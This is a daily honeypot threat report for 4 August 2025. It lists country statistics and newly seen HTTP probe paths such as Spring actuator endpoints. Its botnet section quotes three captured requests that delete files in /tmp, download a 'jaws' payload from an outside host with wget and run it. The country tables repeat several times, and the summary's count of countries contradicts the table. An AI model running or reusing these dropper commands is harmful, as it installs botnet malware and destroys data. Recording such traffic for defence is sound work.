Table of Contents

Daily Report: 2025-08-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 26 new requests that have never been observed before (these were added to the monitored request database.).

A total of 427 requests were recorded during the day, originating from 3 different countries, with a peak of 91 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Germany
BR	Germany
SG	Germany

botnet_dropper_behaviour
#

remote_addr	request
197.51.187.185	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
8.219.214.90	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.71.237.92	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
63	1	GET /dev/actuator/ HTTP/1.1
64	1	GET /management/;/env HTTP/1.1
66	1	GET /management/mappings HTTP/1.1
67	1	GET /management/ HTTP/1.1
68	1	GET /api/actuator/;/env HTTP/1.1
70	1	GET /api/actuator/ HTTP/1.1
71	1	GET /actuator/;/env HTTP/1.1
73	1	GET /actuator/mappings HTTP/1.1
75	1	GET /reports.js HTTP/1.1
76	1	GET /js/bundle.js HTTP/1.1
77	1	GET /bundle.5.1.1.js HTTP/1.1
78	1	GET /js/messages_manager.js HTTP/1.1
79	1	GET /scripts/services.js HTTP/1.1
80	1	GET /js/configuration.js HTTP/1.1
81	1	GET /js/lib/config.js HTTP/1.1
82	1	GET /js/base.js HTTP/1.1
86	1	GET /message-api/actuator/ HTTP/1.1
94	1	GET /mappings.json HTTP/1.1
123	1	GET /resource/image/adminapi/default/web_favicon.ico HTTP/1.1
126	1	GET /app/actuator/ HTTP/1.1
160	1	GET /Odin/http/call1754287869 HTTP/1.1
161	1	GET /OdinHttpCall1754287869 HTTP/1.1
162	1	GET /odinhttpcall1754287869 HTTP/1.1
163	1	GET /OdinHttpCall1754293074 HTTP/1.1
164	1	GET /Odin/http/call1754293074 HTTP/1.1
174	1	GET /odinhttpcall1754293074 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	91	US
1	73	DE
2	56	NL
3	51	GB
4	45	SG
5	18	SC
6	12	PL
7	11	LT
8	11	BG
9	10	CA
10	9	ZA
11	5	BE
12	5	IN
13	4	RO
14	4	HU
15	3	BR
16	3	KR
17	2	IR
18	2	RU
19	2	GH
20	1	FI
21	1	EG
22	1	FR
23	1	EE
24	1	SI
25	1	CN
26	1	GR
27	1	TW
28	1	LB
29	1	HK

Report: 2025-08-03

3 August 2025·355 words

Repport Daily

Report: 2025-08-02

2 August 2025·340 words

Repport Daily

Report: 2025-08-01

1 August 2025·311 words

Repport Daily

	number_of_occurence	country_iso_code
0	91	US
1	73	DE
2	56	NL
3	51	GB
4	45	SG
5	18	SC
6	12	PL
7	11	LT
8	11	BG
9	10	CA
10	9	ZA
11	5	BE
12	5	IN
13	4	RO
14	4	HU
15	3	BR
16	3	KR
17	2	IR
18	2	RU
19	2	GH
20	1	FI
21	1	EG
22	1	FR
23	1	EE
24	1	SI
25	1	CN
26	1	GR
27	1	TW
28	1	LB
29	1	HK

	number_of_occurence	country_iso_code
0	91	US
1	73	DE
2	56	NL
3	51	GB
4	45	SG
5	18	SC
6	12	PL
7	11	LT
8	11	BG
9	10	CA
10	9	ZA
11	5	BE
12	5	IN
13	4	RO
14	4	HU
15	3	BR
16	3	KR
17	2	IR
18	2	RU
19	2	GH
20	1	FI
21	1	EG
22	1	FR
23	1	EE
24	1	SI
25	1	CN
26	1	GR
27	1	TW
28	1	LB
29	1	HK

Daily Report: 2025-08-04#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-08-04
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	91	US
1	73	DE
2	56	NL
3	51	GB
4	45	SG
5	18	SC
6	12	PL
7	11	LT
8	11	BG
9	10	CA
10	9	ZA
11	5	BE
12	5	IN
13	4	RO
14	4	HU
15	3	BR
16	3	KR
17	2	IR
18	2	RU
19	2	GH
20	1	FI
21	1	EG
22	1	FR
23	1	EE
24	1	SI
25	1	CN
26	1	GR
27	1	TW
28	1	LB
29	1	HK